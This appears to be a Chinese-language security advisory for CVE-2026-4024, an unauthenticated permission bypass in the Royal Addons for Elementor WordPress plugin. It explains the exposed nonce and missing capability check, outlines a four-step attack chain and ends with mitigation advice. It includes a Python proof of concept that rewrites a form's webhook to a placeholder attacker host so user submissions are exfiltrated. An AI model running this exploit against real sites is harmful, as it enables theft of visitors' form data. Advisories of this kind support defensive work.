CVE-2026-4024 CVSS 5.3 中危

CVE-2026-4024 WordPress Royal Addons插件权限绕过漏洞

披露日期: 2026-05-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4024

漏洞类型

权限绕过

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Royal Addons for Elementor

漏洞概述

WordPress插件Royal Addons for Elementor在1.7.1056及之前版本中存在权限绕过漏洞。由于AJAX处理函数未实施能力检查且验证用的Nonce在前端公开暴露，未认证攻击者可利用此漏洞修改任意文章的表单配置元数据（如邮件、Webhook），劫持数据传输路径，最终导致敏感用户信息泄露。

技术细节

该漏洞的核心在于插件对`wpr_update_form_action_meta` AJAX操作的权限控制存在严重缺陷。尽管代码逻辑中包含了Nonce验证步骤，但该Nonce值被直接输出在前端JavaScript的`WprConfig`全局对象中，导致任何访问者均可轻松获取。由于该AJAX动作同时注册在`wp_ajax`和`wp_ajax_nopriv`钩子上，意味着未登录的匿名用户也可以触发该操作。攻击者在获取到Nonce后，可以通过发送POST请求直接调用后端的`update_post_meta()`函数。由于后端未对请求者是否具有文章编辑权限或所有权进行校验，攻击者可以修改任意文章ID下的表单配置元数据，例如将邮件通知地址或Webhook URL篡改为攻击者控制的服务器地址，进而劫持用户提交的表单数据，造成信息泄露。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用了存在漏洞的Royal Addons for Elementor插件（版本<=1.7.1056），并找到一个包含插件的页面。

STEP 2

获取Nonce

攻击者访问包含Royal Addons组件的前端页面，查看页面源代码或JavaScript对象，提取出公开暴露的`WprConfig.nonce`值。

STEP 3

发送恶意请求

攻击者向`/wp-admin/admin-ajax.php`发送POST请求，携带获取到的Nonce、目标文章ID以及恶意的Webhook URL，调用`wpr_update_form_action_meta`动作。

STEP 4

数据窃取

服务器端因缺少权限校验，接受请求并更新数据库中的表单配置。当真实用户提交表单时，数据将被发送至攻击者控制的Webhook地址。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/wp-admin/admin-ajax.php"
post_id = "123"  # ID of a post containing a Royal Addons form
attacker_webhook = "http://attacker.com/collect"

# Step 1: Get the nonce from the frontend (simulated)
# In a real scenario, scrape a page with the widget to find WprConfig.nonce
# nonce = "scraped_nonce_value_from_js"
nonce = "publicly_exposed_nonce_value"

# Step 2: Prepare the payload to modify the form webhook
payload = {
    "action": "wpr_update_form_action_meta",
    "nonce": nonce,
    "post_id": post_id,
    "key": "webhook_url",  # Vulnerable meta key in whitelist
    "value": attacker_webhook
}

# Step 3: Send the malicious request
try:
    response = requests.post(target_url, data=payload)
    if response.status_code == 200:
        print("[+] Exploit successful! Webhook URL updated.")
        print(f"[+] Data will be exfiltrated to: {attacker_webhook}")
    else:
        print("[-] Exploit failed.")
        print(response.text)
except Exception as e:
    print(f"[Error]: {e}")

影响范围

Royal Addons for Elementor <= 1.7.1056

防御指南

临时缓解措施

建议立即将Royal Addons for Elementor插件更新至最新版本以修复此漏洞。若无法立即更新，请暂时禁用该插件中的表单功能，或者限制对WordPress `admin-ajax.php`接口的访问，仅允许受信任的IP或经过严格认证的用户调用特定动作。同时，应全面审查网站表单的配置记录，排查是否存在已被篡改的Webhook或邮件转发地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表